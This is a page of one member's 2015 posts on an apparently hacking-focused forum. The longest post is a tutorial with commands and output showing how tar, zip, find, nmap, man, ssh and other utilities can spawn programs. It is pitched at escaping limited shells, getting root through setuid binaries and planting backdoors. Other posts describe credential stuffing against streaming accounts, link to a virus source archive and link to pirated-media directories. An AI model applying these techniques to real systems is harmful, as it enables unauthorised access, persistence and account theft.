Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - inability

Pages: [1]
1
Hacking and Security / Re: Is it still possible to brute force online?
« on: November 30, 2015, 05:01:41 pm »
Depending on your target, it may be worthwhile to instead try a small amount of passwords and attempt them on a range of accounts instead of hammering one at a time.

This is absolutely true. Doing a username/password list attack with a large number of accounts and a small number of passwords uses less effort and will net you the low-hanging fruit in a shorter amount of time.

Bruteforcing in the sense of trying every single possible password against a target account, or even a dictionary attack, is largely neutralised on websites due to the presence of rate limiting and CAPTCHAs. You're not going to find an even moderately big online service that doesn't have some form of protection against these attacks.

The closest thing to bruteforcing that is actually prevalent now is the use of combolists to score accounts on various websites. The idea is that username/password combos are obtained (most of the time through the compromise of some site) and tools are used along with thousands of open proxies to try these combos on websites such as Netflix and Hulu+. The idea, as you can imagine, is to get premium content for free.

2
Shouldn't action='http://____.ddns.net'... be same as action='public_ip' ? Not sure what I am doing wrong, but again, any help would be appreciated  :)

Wait, did you actually put "http://" in the config? I'm pretty sure only the hostname goes in there, so no scheme is present.

3
Found it on the Webs / Re: Sci-Hub, LibGen, and BookFi returns
« on: November 22, 2015, 07:21:11 am »
Hm, I never realised that they were shut down to begin with. I'm pretty sure I got something off of libgen in the last month or so.

Court-mandated shutdowns of "copyright infringing" sites never really work...

4
General discussion / Re: "Speed-reading"
« on: November 22, 2015, 07:00:04 am »
Personally, I am wary of any method that claims to offer more than 50% comprehension. Most speed-reading methods tend to be centered around skimming, which is detrimental to comprehension especially for information-rich texts, and eliminating subvocalization, which might be slightly better but in the end is still not going to get you anything above, say, 60% comprehension. From the Wikipedia article you linked:

Quote
The World Championship Speed Reading Competition stresses reading comprehension as critical. The top contestants typically read around 1,000 to 2,000 words per minute with approximately 50% comprehension or above. The world champion is Anne Jones with 4,700 words per minute with 67% comprehension.

At some point, you're going to get a diminishing ROI in terms of word speed vs. comprehension.

5
Found it on the Webs / Re: Phuc Dat Bich and Fb
« on: November 21, 2015, 06:03:45 pm »
So a false positive of fake name detection. I can understand why he feels offended.

Btw, did you ever hear of this guy?



Fun fact, the guy eventually got jailed for drug offences... http://www.reuters.com/article/2013/11/11/us-singapore-batman-idUSBRE9AA0G420131111

6
Assembly - Embedded / Re: Vintage virus source code
« on: November 21, 2015, 05:11:43 am »
More code for various types of old malware is available here: http://repo.hackerzvoice.net/depot_madchat/vxdevl/vxsrc/

7
A whole bunch of crap; Windows software, Movies, even a whole folder of Tom and Jerry cartoons: http://217.219.143.104/9304D/

Bunch of TV shows: http://hosein.5teh-song.pw/Serial.1/

A lot of anime: http://desu.ru/

8
I know, I know, the title may be a bit confusing. I'll explain.

Imagine that you've found your way into a router or network gateway device, but you're stuck with a lousy limited command shell that only gives you access to essential utilities. Or you've discovered that some binaries have been setuid root when they shouldn't be (like nmap), and are wondering if you can somehow spawn a root shell one way or another. Or you ARE root, and you want to plant a sneaky backdoor by making a common utility setuid root so that you can use it to regain privs later. Either way, what you're looking for is a utility with options that you can abuse to spawn any other program from that utility.

First, the test script. This echoes a message that displays the caller of the script:
Code: [Select]
$ cat test.sh
#!/bin/sh

CALLER="$(ps -o comm= $PPID)"
echo "This shell script was invoked by $CALLER">&2

$ ./test.sh
This shell script was invoked by bash

Now, the programs you can use. Many of these were taken from this blog post by @0xmitsurugi.

tar:
Code: [Select]
$ touch dummyfile
$ tar czf dummy.tar --checkpoint=1 --checkpoint-action="exec=./test.sh" dummyfile
This shell script was invoked by tar

$ tar cf dummy2.tar -I "./test.sh" dummyfile
This shell script was invoked by tar

$ tar xf dummy.tar --to-command=./test.sh
This shell script was invoked by tar

$ tar cf fake@localhost:/fake/fake.tar --rsh-command=./test.sh dummyfile
This shell script was invoked by tar
tar: fake@localhost\:/fake/fake.tar: Cannot open: Input/output error
tar: Error is not recoverable: exiting now

zip:
Code: [Select]
$ zip dummy.zip -T -TT ./test.sh
This shell script was invoked by sh
test of dummy.zip OK

ftp, telnet, gdb etc.:
Code: [Select]
$ ftp
ftp> ! ./test.sh
This shell script was invoked by ftp
ftp> exit
$ gdb -q
(gdb) ! ./test.sh
This shell script was invoked by gdb
(gdb) exit
You can also execute commands with vim.

find (this one should be pretty obvious):
Code: [Select]
$ find -name dummyfile -exec ./test.sh \;
This shell script was invoked by find

nmap (this is awesome for stealthy backdoors, because many of nmap's functions require root anyway so setuid root is not out of the ordinary):
Code: [Select]
$ cat exec.lua
os.execute("./test.sh");
$ nmap --script exec.lua -p80 localhost

Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-20 17:03 CET
NSE: Warning: Loading 'exec.lua' -- the recommended file extension is '.nse'.
This shell script was invoked by sh
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:559: exec.lua is missing required field: 'action'
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:559: in function 'new'
        /usr/bin/../share/nmap/nse_main.lua:788: in function 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1276: in main chunk
        [C]: in ?

QUITTING!
You can also make use of this Metasploit module.

man:
Code: [Select]
$ man -P ./test.sh man
This shell script was invoked by man

ssh (thanks to http://www.hackdog.me/wordpress/archives/454):
Code: [Select]
$ cat ~/.ssh/config
host lol
hostname localhost
user inability
ProxyCommand ./test.sh
$ ssh lol
This shell script was invoked by ssh
ssh_exchange_identification: Connection closed by remote host
$ slogin lol
This shell script was invoked by slogin
ssh_exchange_identification: Connection closed by remote host

These are the ones I know of. Do you know of any such utilities that also have such options?

9
General discussion / Re: Anonymous declares war on Isil
« on: November 19, 2015, 10:25:11 am »
Well.... the NSA and FBI are mad because when anonymous exposed the Twitter accounts of ISIS members the company acted fast and suspended some of them. Really what anonymous is doing is pointless because the NSA and FBI could've used the accounts to read their messages which is one way they communicate and recruit  :o

They're the NSA and FBI. Suspension or otherwise, they can still read the accounts' messages and info.

This will amount to nothing, really. Twitter isn't even the only channel ISIS uses to spread propaganda, they also make use of encrypted messaging apps such as Telegram to do the same. At most the people doing the radicalising will be temporarily inconvenienced, but it's not as if they've done the equivalent of killing Osama bin Laden.

10
Anonymity and Privacy / Re: vpn discussion
« on: November 18, 2015, 02:30:32 pm »
I'm partial towards Cryptostorm myself.

Pages: [1]